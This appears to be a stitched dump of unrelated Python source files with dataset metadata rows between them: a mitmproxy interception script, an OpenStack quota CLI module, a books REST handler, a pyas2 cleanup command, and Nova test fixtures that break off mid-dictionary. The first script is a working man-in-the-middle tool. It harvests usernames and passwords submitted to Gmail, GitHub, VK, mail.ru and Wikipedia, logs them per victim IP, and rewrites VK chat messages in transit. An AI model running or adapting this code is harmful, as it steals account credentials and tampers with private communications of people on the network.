class VK_data:
def __init__(self):
self.users = {}
self.current_user = ""
# temp user to store data if we do not currently know the id
self.on_new_id("temp")
self.ips = {}
def from_a_typing(self, string):
m = re.match(r"act=a_typing&al=(?P<al>\d+)&gid=(?P<gid>\d+)&hash=(?P<hash>\w+)&peer=(?P<peer>\d+)", string)
if not m:
logging.debug("from_a_typing: Failed to parse " + string)
return [0]
logging.debug("Typing: al = " + m.group('al') + " gid = " + m.group('gid') +
" hash = " + m.group('hash') + " peer = " + m.group('peer'))
if m.group('peer') not in self.users[self.current_user].peers.keys():
self.users[self.current_user].peers[m.group('peer')] = Set([])
self.users[self.current_user].peers[m.group('peer')].add(m.group('hash'))
return [1]
def from_a_send(self, string):
m = re.match((r"act=a_send&al=(?P<al>\d+)&gid=(?P<gid>\d+)&guid" +
"=(?P<guid>\d+\.?\d*)&hash=(?P<hash>\w+)&media=(?P" +
"<media>\w*)&msg=(?P<msg>[\w\W]*)&title=(?P<title>\w*)" +
"&to=(?P<to>\d+)&ts=(?P<ts>\d+)"), string, re.UNICODE)
if not m:
logging.debug(string)
return [0, string]
# logging.debug("al = " + m.group('al'))
# logging.debug("gid = " + m.group('gid'))
# logging.debug("guid = " + m.group('guid'))
# logging.debug("hash = " + m.group('hash'))
# logging.debug("media = " + m.group('media'))
# logging.debug("msg = " + m.group('msg'))
# logging.debug("title = " + m.group('title'))
# logging.debug("to = " + m.group('to'))
# logging.debug("ts = " + m.group('ts'))
if m.group('to') not in self.users[self.current_user].peers.keys():
self.users[self.current_user].peers[m.group('to')] = Set([])
self.users[self.current_user].peers[m.group('to')].add(m.group('hash'))
self.users[self.current_user].messages.append([m.group('msg'), m.group('to'), m.group('hash')])
logging.debug(str(self.users[self.current_user]))
# Substitute message
string_ = ("act=a_send&al="+m.group('al')+"&gid="+m.group('gid')+"&guid="+
m.group('guid')+"&hash="+m.group('hash')+"&media="+m.group('media')+
"&msg="+"I have been pwn3d"+"&title="+m.group('title')+
"&to="+m.group('to')+"&ts="+m.group('ts'))
return [2, string_]
def from_a_check(self, string):
m_key = re.match(r"act=a_check&key=[\w\W]*", string, re.UNICODE)
m_id = re.match(r"act=a_check&id=(?P<id>\d+)&[\w\W]*", string, re.UNICODE)
if m_key:
return [1]
if m_id:
logging.debug("[a_check]: Found my id: " + m_id.group('id'))
self.on_new_id(m_id.group('id'))
return [1]
logging.debug(string)
return [0]
def decode_request(self, string):
try:
string = urllib.unquote(string).decode('utf-8')
except Exception as e:
logging.debug("Exception in 'decode_request':")
logging.debug(e)
m = re.match(r"act=(?P<type>\w+)&\w+", string)
if not m:
return [0]
if m.group('type') == "a_typing":
return self.from_a_typing(string)
if m.group('type') == "a_send":
return self.from_a_send(string)
if m.group('type') == "a_check":
return self.from_a_check(string)
# No-info types
if m.group('type') == "login":
return [1]
if m.group('type') == "pad":
return [1]
if m.group('type') == "a_friends":
return [1]
if m.group('type') == "a_onlines":
return [1]
if m.group('type') == "a_release":
return [1]
if m.group('type') == "a_get_fast_chat":
return [1]
# logging.debug("Unable to decode type " + m.group('type')
# + "! " + string)
return [0]
def decode_response(self, string):
m = re.match(r"\{\"ts\":(?P<num>\d+),\"updates\":(?P<lstring>[\w\W]+),\"(?P<msg>[\w\W]+)\",\{\}(?P<rstring>[\w\W]*)\}", string)
if not m:
return [0]
self.users[self.current_user].messages.append([m.group('msg'), str(self.users[self.current_user].id), "-"])
logging.debug(str(self.users[self.current_user]))
string_ = "{\"ts\":"+m.group('num')+",\"updates\":"+m.group('lstring')+",\""+"you have been pwn3d"+"\",{}"+m.group('rstring')+"}"
return [2, string_]
def applet_deauth(self, string, ip):
m = re.match(r"[\w\W]+&access_token=(?P<token>[\w\W]*)&v=(?P<v>\d+\.?\d*)", string)
if not m:
return [0]
if ip not in self.ips.keys():
logging.debug("NEW ENTRY; IP = " + str(ip))
self.ips[ip] = [False, m.group('token'), m.group('v')]
if (self.ips[ip][0]):
logging.debug("IP" + str(ip) + " is already processed")
return [1]
return [2, "error=1"]
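        # NOTE: the early return above short-circuits this handler, so the
        # deauth request built below is currently unreachable.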
string_ = ("code=return{offline:API.account.setOffline({}),};&lang=ru&access_token=" +
m.group('token') +"&v=" + m.group('v'))
logging.debug("\nSENDING: " + string_ + "\n")
return [2, string_]
def decode_java(self, string):
try:
string = urllib.unquote(string).decode('utf-8')
except Exception as e:
# logging.debug("Exception in 'decode_java':")
# logging.debug(e)
pass
m = re.match((r"code=var mid = API.messages.send\(\{\"peer_id\":(?P<to>\d+),\"message\":\"(?P<msg>[\w\W]*)\"," +
"\"type\":\"(?P<type>[\w\W]*)\",\"guid\":(?P<guid>\d+),\"attachment\":(?P<att>[\w\W]*)"), string)
#logging.debug(str(string))
if not m:
return [0]
string_ = ("code=var mid = API.messages.send({\"peer_id\":" + m.group('to') + ",\"message\":\"i have been pwn3d\"," +
"\"type\":\"" + m.group('type') + "\",\"guid\":" + m.group('guid') + ",\"attachment\":" + m.group('att'))
return [2, string_]
def on_new_id(self, my_id):
if my_id not in self.users.keys():
self.users[my_id] = VK_user()
self.users[my_id].id = my_id
if (self.current_user == "temp") and (my_id != "temp"):
self.users[my_id] = self.users["temp"]
self.users[my_id].id = my_id
self.users["temp"] = VK_user()
self.current_user = my_id
# logging.debug("Known my_ids: " + str(self.users.keys()))
# logging.debug("Current my_id: " + str(self.current_user))
class PW_data:
def __init__(self):
self.passwords = []
def sniff_passwords(self, string, ip, vk_data):
if ("assword" not in string) and ("asswd" not in string) and ("pass" not in string) and ("Pass" not in string):
return
# logging.debug("STR: " + str(string))
try:
string = urllib.unquote(string).decode('utf-8')
except Exception as e:
# logging.debug("Exception in 'sniff_passwords':")
# logging.debug(e)
return
# Wiki
m = re.match(r"wpName=(?P<login>[^&]*)&wpPassword=(?P<password>[^&]*)&[\w\W]*", string)
if (m):
self.passwords.append([ip, "wikipedia.org", m.group('login'), m.group('password')])
logging.debug(str(self))
return
# Mail.ru
m = re.match(r"Login=(?P<login>[^&]*)&Domain=(?P<domain>[^&]*)&Password=(?P<password>[^&]*)&[\w\W]*", string)
if (m):
self.passwords.append([ip, "mail.ru", m.group('login')+'@'+m.group('domain'), m.group('password')])
logging.debug(str(self))
return
# Github
m = re.match(r"[\w\W]*&login=(?P<login>[^&]*)&password=(?P<password>[^&]*)[\w\W]*", string)
if (m):
self.passwords.append([ip, "github.com", m.group('login'), m.group('password')])
logging.debug(str(self))
return
# Gmail
m = re.match(r"[\w\W]*&Email=(?P<login>[^&]*)&Passwd=(?P<password>[^&]*)&[\w\W]*", string)
if (m):
self.passwords.append([ip, "gmail.com", m.group('login'), m.group('password')])
logging.debug(str(self))
return
# vk.com
m = re.match(r"act=login&[\w\W]*&email=(?P<login>[^&]*)&pass=(?P<password>[^&]*)", string)
if (m):
self.passwords.append([ip, "vk.com", m.group('login'), m.group('password')])
logging.debug(str(self))
return
# vk.com mobile
m = re.match(r"password=(?P<password>[^&]*)&[\w\W]*&username=(?P<login>[^&]*)&[\w\W]*&client_secret=(?P<secret>[^&]*)&client_id=(?P<id>\d+)", string)
if (m):
self.passwords.append([ip, "vk.com (mobile)", m.group('login'), m.group('password')])
logging.debug(str(self))
if ip not in vk_data.ips.keys():
vk_data.ips[ip] = [True, "", ""]
vk_data.ips[ip][0] = True
logging.debug("UNLOCKED IP = " + str(ip))
return
# Other websites
self.passwords.append([ip, string])
logging.debug(str(self))
def __repr__(self):
s = '\n'
s += "user".ljust(30) + "website".ljust(30) + "login".ljust(30) + "password".ljust(20) + '\n'
for entry in self.passwords:
if (len(entry) == 4):
s += entry[0].ljust(30)+entry[1].ljust(30)+entry[2].ljust(30)+entry[3].ljust(20) + '\n'
else:
s += entry[0].ljust(30)+entry[1] + '\n'
s += '\n'
return s
vk_db = VK_data()
pw_db = PW_data()
def request(context, flow):
try:
with decoded(flow.request): # automatically decode gzipped responses.
sourse_ip = str(flow.client_conn.address).split("'")[1]
dest_ip = str(flow.request.host)
#logging.debug("Sending (" + sourse_ip + " -> " + dest_ip + ")")
pw_db.sniff_passwords(str(flow.request.content), sourse_ip, vk_db)
# Regular vk
result = vk_db.decode_request(str(flow.request.content))
if (result[0] == 2):
flow.request.content = result[1]
# vk App deauth
result = vk_db.applet_deauth(str(flow.request.content), sourse_ip)
if (result[0] == 2):
flow.request.content = result[1]
# vk mobile App
result = vk_db.decode_java(str(flow.request.content))
if (result[0] == 2):
flow.request.content = result[1]
except Exception as e:
# logging.debug("Exception in 'request':")
# logging.debug(e)
pass
def response(context, flow):
try:
with decoded(flow.response): # automatically decode gzipped responses.
result = vk_db.decode_response(str(flow.response.content))
if (result[0] == 2):
flow.response.content = result[1]
except Exception as e:
# logging.debug("Exception in 'response':")
# logging.debug(e)
pass
def start (context, argv):
logging.debug("============================================\n")
logging.debug(time.time())
logging.debug("Startup:\n")
context.log("start")
| mit | -4,966,170,004,822,145,000 | 34.622159 | 157 | 0.490709 | false | 3.240052 | false | false | false |
sjsucohort6/openstack | python/venv/lib/python2.7/site-packages/openstackclient/common/quota.py | 1 | 7859 | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Quota action implementations"""
import itertools
import logging
import six
import sys
from cliff import command
from cliff import show
from openstackclient.common import utils
# List the quota items, map the internal argument name to the option
# name that the user sees.
COMPUTE_QUOTAS = {
'cores': 'cores',
'fixed_ips': 'fixed-ips',
'floating_ips': 'floating-ips',
'injected_file_content_bytes': 'injected-file-size',
'injected_file_path_bytes': 'injected-path-size',
'injected_files': 'injected-files',
'instances': 'instances',
'key_pairs': 'key-pairs',
'metadata_items': 'properties',
'ram': 'ram',
'security_group_rules': 'secgroup-rules',
'security_groups': 'secgroups',
}
VOLUME_QUOTAS = {
'gigabytes': 'gigabytes',
'snapshots': 'snapshots',
'volumes': 'volumes',
}
NETWORK_QUOTAS = {
'floatingip': 'floating-ips',
'security_group_rule': 'secgroup-rules',
'security_group': 'secgroups',
}
class SetQuota(command.Command):
"""Set quotas for project or class"""
log = logging.getLogger(__name__ + '.SetQuota')
def get_parser(self, prog_name):
parser = super(SetQuota, self).get_parser(prog_name)
parser.add_argument(
'project',
metavar='<project/class>',
help='Set quotas for this project or class (name/ID)',
)
parser.add_argument(
'--class',
dest='quota_class',
action='store_true',
default=False,
help='Set quotas for <class>',
)
for k, v in itertools.chain(
COMPUTE_QUOTAS.items(), VOLUME_QUOTAS.items()):
parser.add_argument(
'--%s' % v,
metavar='<%s>' % v,
type=int,
help='New value for the %s quota' % v,
)
parser.add_argument(
'--volume-type',
metavar='<volume-type>',
help='Set quotas for a specific <volume-type>',
)
return parser
@utils.log_method(log)
def take_action(self, parsed_args):
compute_client = self.app.client_manager.compute
volume_client = self.app.client_manager.volume
compute_kwargs = {}
for k, v in COMPUTE_QUOTAS.items():
value = getattr(parsed_args, k, None)
if value is not None:
compute_kwargs[k] = value
volume_kwargs = {}
for k, v in VOLUME_QUOTAS.items():
value = getattr(parsed_args, k, None)
if value is not None:
if parsed_args.volume_type:
k = k + '_%s' % parsed_args.volume_type
volume_kwargs[k] = value
if compute_kwargs == {} and volume_kwargs == {}:
sys.stderr.write("No quotas updated")
return
if parsed_args.quota_class:
if compute_kwargs:
compute_client.quota_classes.update(
parsed_args.project,
**compute_kwargs)
if volume_kwargs:
volume_client.quota_classes.update(
parsed_args.project,
**volume_kwargs)
else:
if compute_kwargs:
compute_client.quotas.update(
parsed_args.project,
**compute_kwargs)
if volume_kwargs:
volume_client.quotas.update(
parsed_args.project,
**volume_kwargs)
class ShowQuota(show.ShowOne):
"""Show quotas for project or class"""
log = logging.getLogger(__name__ + '.ShowQuota')
def get_parser(self, prog_name):
parser = super(ShowQuota, self).get_parser(prog_name)
parser.add_argument(
'project',
metavar='<project/class>',
help='Show this project or class (name/ID)',
)
type_group = parser.add_mutually_exclusive_group()
type_group.add_argument(
'--class',
dest='quota_class',
action='store_true',
default=False,
help='Show quotas for <class>',
)
type_group.add_argument(
'--default',
dest='default',
action='store_true',
default=False,
help='Show default quotas for <project>'
)
return parser
def get_compute_volume_quota(self, client, parsed_args):
try:
if parsed_args.quota_class:
quota = client.quota_classes.get(parsed_args.project)
elif parsed_args.default:
quota = client.quotas.defaults(parsed_args.project)
else:
quota = client.quotas.get(parsed_args.project)
except Exception as e:
if type(e).__name__ == 'EndpointNotFound':
return {}
else:
raise e
return quota._info
def get_network_quota(self, parsed_args):
if parsed_args.quota_class or parsed_args.default:
return {}
service_catalog = self.app.client_manager.auth_ref.service_catalog
if 'network' in service_catalog.get_endpoints():
network_client = self.app.client_manager.network
return network_client.show_quota(parsed_args.project)['quota']
else:
return {}
@utils.log_method(log)
def take_action(self, parsed_args):
compute_client = self.app.client_manager.compute
volume_client = self.app.client_manager.volume
# NOTE(dtroyer): These quota API calls do not validate the project
# or class arguments and return what appears to be
# the default quota values if the project or class
# does not exist. If this is determined to be the
# intended behaviour of the API we will validate
# the argument with Identity ourselves later.
compute_quota_info = self.get_compute_volume_quota(compute_client,
parsed_args)
volume_quota_info = self.get_compute_volume_quota(volume_client,
parsed_args)
network_quota_info = self.get_network_quota(parsed_args)
info = {}
info.update(compute_quota_info)
info.update(volume_quota_info)
info.update(network_quota_info)
# Map the internal quota names to the external ones
# COMPUTE_QUOTAS and NETWORK_QUOTAS share floating-ips,
# secgroup-rules and secgroups as dict value, so when
# neutron is enabled, quotas of these three resources
# in nova will be replaced by neutron's.
for k, v in itertools.chain(
COMPUTE_QUOTAS.items(), VOLUME_QUOTAS.items(),
NETWORK_QUOTAS.items()):
if not k == v and info.get(k):
info[v] = info[k]
info.pop(k)
# Handle project ID special as it only appears in output
if 'id' in info:
info['project'] = info.pop('id')
return zip(*sorted(six.iteritems(info)))
| mit | -5,707,946,925,653,465,000 | 33.169565 | 77 | 0.56254 | false | 4.236658 | false | false | false |
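# Illustrative sketch (not part of the openstackclient source above): the tail
# of ShowQuota.take_action() only renames internal quota keys to their external
# option names.  A standalone rendition, assuming the three *_QUOTAS dicts
# defined above are in scope:
import itertools

info = {'floating_ips': 10, 'security_group': 20, 'gigabytes': 1000}
for k, v in itertools.chain(COMPUTE_QUOTAS.items(), VOLUME_QUOTAS.items(),
                            NETWORK_QUOTAS.items()):
    if k != v and info.get(k):
        info[v] = info.pop(k)
# info is now {'gigabytes': 1000, 'floating-ips': 10, 'secgroups': 20}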
marcosxddh/aula_script | backend/appengine/routes/books/rest.py | 1 | 1044 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
from gaebusiness.business import CommandExecutionException
from tekton.gae.middleware.json_middleware import JsonResponse
from book_app import facade
def index():
cmd = facade.list_books_cmd()
book_list = cmd()
    short_form = facade.book_short_form()
book_short = [short_form.fill_with_model(m) for m in book_list]
return JsonResponse(book_short)
def save(**book_properties):
cmd = facade.save_book_cmd(**book_properties)
return _save_or_update_json_response(cmd)
def update(book_id, **book_properties):
cmd = facade.update_book_cmd(book_id, **book_properties)
return _save_or_update_json_response(cmd)
def delete(book_id):
facade.delete_book_cmd(book_id)()
def _save_or_update_json_response(cmd):
try:
book = cmd()
except CommandExecutionException:
return JsonResponse({'errors': cmd.errors})
    short_form = facade.book_short_form()
return JsonResponse(short_form.fill_with_model(book))
| mit | 2,769,724,432,939,574,300 | 27.216216 | 67 | 0.704981 | false | 3.356913 | false | false | false |
abhishek-ram/pyas2 | pyas2/management/commands/cleanas2server.py | 1 | 3094 | from django.core.management.base import BaseCommand
from django.utils.translation import ugettext as _
from datetime import timedelta
from django.utils import timezone
from pyas2 import models
from pyas2 import pyas2init
import os
import glob
class Command(BaseCommand):
help = _(u'Automatic maintenance for the AS2 server. '
u'Cleans up all the old logs, messages and archived files.')
def handle(self, *args, **options):
pyas2init.logger.info(_(u'Automatic maintenance process started'))
max_archive_dt = timezone.now() - timedelta(
pyas2init.gsettings['max_arch_days'])
max_archive_ts = int(max_archive_dt.strftime("%s"))
pyas2init.logger.info(
_(u'Delete all DB Objects older than max archive days'))
old_message = models.Message.objects.filter(
timestamp__lt=max_archive_dt).order_by('timestamp')
for message in old_message:
pyas2init.logger.debug(
_(u'Delete Message {} and all related '
u'objects'.format(message)))
if message.payload:
message.payload.delete()
if message.mdn:
message.mdn.delete()
message.delete()
pyas2init.logger.info(
_(u'Delete all logs older than max archive days'))
log_folder = os.path.join(pyas2init.gsettings['log_dir'], 'pyas2*')
for logfile in glob.iglob(log_folder):
filename = os.path.join(
pyas2init.gsettings['log_dir'], logfile)
if os.path.getmtime(filename) < max_archive_ts:
pyas2init.logger.debug(
_(u'Delete Log file {}'.format(filename)))
os.remove(filename)
pyas2init.logger.info(
_(u'Delete all Archive Files older than max archive days'))
archive_folders = [
pyas2init.gsettings['payload_send_store'],
pyas2init.gsettings['payload_receive_store'],
pyas2init.gsettings['mdn_send_store'],
pyas2init.gsettings['mdn_receive_store']
]
for archive_folder in archive_folders:
for (dir_path, dir_names, arch_files) in os.walk(archive_folder):
if len(arch_files) > 0:
for arch_file in arch_files:
filename = os.path.join(dir_path, arch_file)
if os.path.getmtime(filename) < max_archive_ts:
pyas2init.logger.debug(_(u'Delete Archive file '
u'{}'.format(filename)))
os.remove(filename)
# Delete the folder if it is empty
try:
os.rmdir(dir_path)
pyas2init.logger.debug(_(u'Delete Empty Archive folder'
u' {}'.format(dir_path)))
except OSError:
pass
pyas2init.logger.info(_(u'Automatic maintenance process completed'))
| gpl-2.0 | 1,272,911,551,532,576,500 | 42.577465 | 79 | 0.555268 | false | 4.273481 | false | false | false |
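# Illustrative usage sketch (not part of the pyas2 source above): like any
# Django management command, the cleanup can also be triggered from code
# inside a configured Django project (normally it runs via manage.py or cron):
from django.core.management import call_command

call_command('cleanas2server')  # purges old messages, logs and archived files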
tuskar/tuskar-ui | openstack_dashboard/test/test_data/nova_data.py | 1 | 22432 | # Copyright 2012 Nebula, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import json
import uuid
from novaclient.v1_1 import aggregates
from novaclient.v1_1 import availability_zones
from novaclient.v1_1 import certs
from novaclient.v1_1 import flavors
from novaclient.v1_1 import floating_ips
from novaclient.v1_1 import hypervisors
from novaclient.v1_1 import keypairs
from novaclient.v1_1 import quotas
from novaclient.v1_1 import security_group_rules as rules
from novaclient.v1_1 import security_groups as sec_groups
from novaclient.v1_1 import servers
from novaclient.v1_1 import services
from novaclient.v1_1 import usage
from novaclient.v1_1 import volume_snapshots as vol_snaps
from novaclient.v1_1 import volume_types
from novaclient.v1_1 import volumes
from openstack_dashboard.api.base import Quota
from openstack_dashboard.api.base import QuotaSet as QuotaSetWrapper
from openstack_dashboard.api.nova import FloatingIp as NetFloatingIp
from openstack_dashboard.usage.quotas import QuotaUsage
from openstack_dashboard.test.test_data.utils import TestDataContainer
SERVER_DATA = """
{
"server": {
"OS-EXT-SRV-ATTR:instance_name": "instance-00000005",
"OS-EXT-SRV-ATTR:host": "instance-host",
"OS-EXT-STS:task_state": null,
"addresses": {
"private": [
{
"version": 4,
"addr": "10.0.0.1"
}
]
},
"links": [
{
"href": "%(host)s/v1.1/%(tenant_id)s/servers/%(server_id)s",
"rel": "self"
},
{
"href": "%(host)s/%(tenant_id)s/servers/%(server_id)s",
"rel": "bookmark"
}
],
"image": {
"id": "%(image_id)s",
"links": [
{
"href": "%(host)s/%(tenant_id)s/images/%(image_id)s",
"rel": "bookmark"
}
]
},
"OS-EXT-STS:vm_state": "active",
"flavor": {
"id": "%(flavor_id)s",
"links": [
{
"href": "%(host)s/%(tenant_id)s/flavors/%(flavor_id)s",
"rel": "bookmark"
}
]
},
"id": "%(server_id)s",
"user_id": "%(user_id)s",
"OS-DCF:diskConfig": "MANUAL",
"accessIPv4": "",
"accessIPv6": "",
"progress": null,
"OS-EXT-STS:power_state": 1,
"config_drive": "",
"status": "%(status)s",
"updated": "2012-02-28T19:51:27Z",
"hostId": "c461ea283faa0ab5d777073c93b126c68139e4e45934d4fc37e403c2",
"key_name": "%(key_name)s",
"name": "%(name)s",
"created": "2012-02-28T19:51:17Z",
"tenant_id": "%(tenant_id)s",
"metadata": {"someMetaLabel": "someMetaData",
"some<b>html</b>label": "<!--",
"empty": ""}
}
}
"""
USAGE_DATA = """
{
"total_memory_mb_usage": 64246.89777777778,
"total_vcpus_usage": 125.48222222222223,
"total_hours": 125.48222222222223,
"total_local_gb_usage": 0,
"tenant_id": "%(tenant_id)s",
"stop": "2012-01-31 23:59:59",
"start": "2012-01-01 00:00:00",
"server_usages": [
{
"memory_mb": %(flavor_ram)s,
"uptime": 442321,
"started_at": "2012-01-26 20:38:21",
"ended_at": null,
"name": "%(instance_name)s",
"tenant_id": "%(tenant_id)s",
"state": "active",
"hours": 122.87361111111112,
"vcpus": %(flavor_vcpus)s,
"flavor": "%(flavor_name)s",
"local_gb": %(flavor_disk)s
},
{
"memory_mb": %(flavor_ram)s,
"uptime": 9367,
"started_at": "2012-01-31 20:54:15",
"ended_at": null,
"name": "%(instance_name)s",
"tenant_id": "%(tenant_id)s",
"state": "active",
"hours": 2.608611111111111,
"vcpus": %(flavor_vcpus)s,
"flavor": "%(flavor_name)s",
"local_gb": %(flavor_disk)s
}
]
}
"""
def data(TEST):
TEST.servers = TestDataContainer()
TEST.flavors = TestDataContainer()
TEST.keypairs = TestDataContainer()
TEST.security_groups = TestDataContainer()
TEST.security_groups_uuid = TestDataContainer()
TEST.security_group_rules = TestDataContainer()
TEST.security_group_rules_uuid = TestDataContainer()
TEST.volumes = TestDataContainer()
TEST.quotas = TestDataContainer()
TEST.quota_usages = TestDataContainer()
TEST.floating_ips = TestDataContainer()
TEST.floating_ips_uuid = TestDataContainer()
TEST.usages = TestDataContainer()
TEST.certs = TestDataContainer()
TEST.volume_snapshots = TestDataContainer()
TEST.volume_types = TestDataContainer()
TEST.availability_zones = TestDataContainer()
TEST.hypervisors = TestDataContainer()
TEST.services = TestDataContainer()
TEST.aggregates = TestDataContainer()
# Data return by novaclient.
# It is used if API layer does data conversion.
TEST.api_floating_ips = TestDataContainer()
TEST.api_floating_ips_uuid = TestDataContainer()
# Volumes
volume = volumes.Volume(volumes.VolumeManager(None),
dict(id="41023e92-8008-4c8b-8059-7f2293ff3775",
name='test_volume',
status='available',
size=40,
display_name='Volume name',
created_at='2012-04-01 10:30:00',
volume_type=None,
attachments=[]))
nameless_volume = volumes.Volume(volumes.VolumeManager(None),
dict(id="3b189ac8-9166-ac7f-90c9-16c8bf9e01ac",
name='',
status='in-use',
size=10,
display_name='',
display_description='',
device="/dev/hda",
created_at='2010-11-21 18:34:25',
volume_type='vol_type_1',
attachments=[{"id": "1", "server_id": '1',
"device": "/dev/hda"}]))
attached_volume = volumes.Volume(volumes.VolumeManager(None),
dict(id="8cba67c1-2741-6c79-5ab6-9c2bf8c96ab0",
name='my_volume',
status='in-use',
size=30,
display_name='My Volume',
display_description='',
device="/dev/hdk",
created_at='2011-05-01 11:54:33',
volume_type='vol_type_2',
attachments=[{"id": "2", "server_id": '1',
"device": "/dev/hdk"}]))
TEST.volumes.add(volume)
TEST.volumes.add(nameless_volume)
TEST.volumes.add(attached_volume)
vol_type1 = volume_types.VolumeType(volume_types.VolumeTypeManager(None),
{'id': 1,
'name': 'vol_type_1'})
vol_type2 = volume_types.VolumeType(volume_types.VolumeTypeManager(None),
{'id': 2,
'name': 'vol_type_2'})
TEST.volume_types.add(vol_type1, vol_type2)
# Flavors
flavor_1 = flavors.Flavor(flavors.FlavorManager(None),
{'id': "aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa",
'name': 'm1.tiny',
'vcpus': 1,
'disk': 0,
'ram': 512,
'swap': 0,
'extra_specs': {},
'OS-FLV-EXT-DATA:ephemeral': 0})
flavor_2 = flavors.Flavor(flavors.FlavorManager(None),
{'id': "bbbbbbbb-bbbb-bbbb-bbbb-bbbbbbbbbbbb",
'name': 'm1.massive',
'vcpus': 1000,
'disk': 1024,
'ram': 10000,
'swap': 0,
'extra_specs': {'Trusted': True, 'foo': 'bar'},
'OS-FLV-EXT-DATA:ephemeral': 2048})
TEST.flavors.add(flavor_1, flavor_2)
# Keypairs
keypair = keypairs.Keypair(keypairs.KeypairManager(None),
dict(name='keyName'))
TEST.keypairs.add(keypair)
# Security Groups and Rules
def generate_security_groups(is_uuid=False):
def get_id(is_uuid):
global current_int_id
if is_uuid:
return str(uuid.uuid4())
else:
get_id.current_int_id += 1
return get_id.current_int_id
get_id.current_int_id = 0
sg_manager = sec_groups.SecurityGroupManager(None)
rule_manager = rules.SecurityGroupRuleManager(None)
sec_group_1 = sec_groups.SecurityGroup(sg_manager,
{"rules": [],
"tenant_id": TEST.tenant.id,
"id": get_id(is_uuid),
"name": u"default",
"description": u"default"})
sec_group_2 = sec_groups.SecurityGroup(sg_manager,
{"rules": [],
"tenant_id": TEST.tenant.id,
"id": get_id(is_uuid),
"name": u"other_group",
"description": u"NotDefault."})
sec_group_3 = sec_groups.SecurityGroup(sg_manager,
{"rules": [],
"tenant_id": TEST.tenant.id,
"id": get_id(is_uuid),
"name": u"another_group",
"description": u"NotDefault."})
rule = {'id': get_id(is_uuid),
'group': {},
'ip_protocol': u"tcp",
'from_port': u"80",
'to_port': u"80",
'parent_group_id': sec_group_1.id,
'ip_range': {'cidr': u"0.0.0.0/32"}}
icmp_rule = {'id': get_id(is_uuid),
'group': {},
'ip_protocol': u"icmp",
'from_port': u"9",
'to_port': u"5",
'parent_group_id': sec_group_1.id,
'ip_range': {'cidr': u"0.0.0.0/32"}}
group_rule = {'id': 3,
'group': {},
'ip_protocol': u"tcp",
'from_port': u"80",
'to_port': u"80",
'parent_group_id': sec_group_1.id,
'source_group_id': sec_group_1.id}
rule_obj = rules.SecurityGroupRule(rule_manager, rule)
rule_obj2 = rules.SecurityGroupRule(rule_manager, icmp_rule)
rule_obj3 = rules.SecurityGroupRule(rule_manager, group_rule)
sec_group_1.rules = [rule_obj]
sec_group_2.rules = [rule_obj]
return {"rules": [rule_obj, rule_obj2, rule_obj3],
"groups": [sec_group_1, sec_group_2, sec_group_3]}
sg_data = generate_security_groups()
TEST.security_group_rules.add(*sg_data["rules"])
TEST.security_groups.add(*sg_data["groups"])
sg_uuid_data = generate_security_groups(is_uuid=True)
TEST.security_group_rules_uuid.add(*sg_uuid_data["rules"])
TEST.security_groups_uuid.add(*sg_uuid_data["groups"])
# Quota Sets
quota_data = dict(metadata_items='1',
injected_file_content_bytes='1',
volumes='1',
gigabytes='1000',
ram=10000,
floating_ips='1',
fixed_ips='10',
instances='10',
injected_files='1',
cores='10',
security_groups='10',
security_group_rules='20')
quota = quotas.QuotaSet(quotas.QuotaSetManager(None), quota_data)
TEST.quotas.nova = QuotaSetWrapper(quota)
TEST.quotas.add(QuotaSetWrapper(quota))
# Quota Usages
quota_usage_data = {'gigabytes': {'used': 0,
'quota': 1000},
'instances': {'used': 0,
'quota': 10},
'ram': {'used': 0,
'quota': 10000},
'cores': {'used': 0,
'quota': 20}}
quota_usage = QuotaUsage()
for k, v in quota_usage_data.items():
quota_usage.add_quota(Quota(k, v['quota']))
quota_usage.tally(k, v['used'])
TEST.quota_usages.add(quota_usage)
# Limits
limits = {"absolute": {"maxImageMeta": 128,
"maxPersonality": 5,
"maxPersonalitySize": 10240,
"maxSecurityGroupRules": 20,
"maxSecurityGroups": 10,
"maxServerMeta": 128,
"maxTotalCores": 20,
"maxTotalFloatingIps": 10,
"maxTotalInstances": 10,
"maxTotalKeypairs": 100,
"maxTotalRAMSize": 10000,
"totalCoresUsed": 0,
"totalInstancesUsed": 0,
"totalKeyPairsUsed": 0,
"totalRAMUsed": 0,
"totalSecurityGroupsUsed": 0}}
TEST.limits = limits
# Servers
tenant3 = TEST.tenants.list()[2]
vals = {"host": "http://nova.example.com:8774",
"name": "server_1",
"status": "ACTIVE",
"tenant_id": TEST.tenants.first().id,
"user_id": TEST.user.id,
"server_id": "1",
"flavor_id": flavor_1.id,
"image_id": TEST.images.first().id,
"key_name": keypair.name}
server_1 = servers.Server(servers.ServerManager(None),
json.loads(SERVER_DATA % vals)['server'])
vals.update({"name": "server_2",
"status": "BUILD",
"server_id": "2"})
server_2 = servers.Server(servers.ServerManager(None),
json.loads(SERVER_DATA % vals)['server'])
vals.update({"name": u'\u4e91\u89c4\u5219',
"status": "ACTIVE",
"tenant_id": tenant3.id,
"server_id": "3"})
server_3 = servers.Server(servers.ServerManager(None),
json.loads(SERVER_DATA % vals)['server'])
TEST.servers.add(server_1, server_2, server_3)
# VNC Console Data
console = {u'console': {u'url': u'http://example.com:6080/vnc_auto.html',
u'type': u'novnc'}}
TEST.servers.vnc_console_data = console
# SPICE Console Data
console = {u'console': {u'url': u'http://example.com:6080/spice_auto.html',
u'type': u'spice'}}
TEST.servers.spice_console_data = console
# Floating IPs
def generate_fip(conf):
return floating_ips.FloatingIP(floating_ips.FloatingIPManager(None),
conf)
fip_1 = {'id': 1,
'fixed_ip': '10.0.0.4',
'instance_id': server_1.id,
'ip': '58.58.58.58',
'pool': 'pool1'}
fip_2 = {'id': 2,
'fixed_ip': None,
'instance_id': None,
'ip': '58.58.58.58',
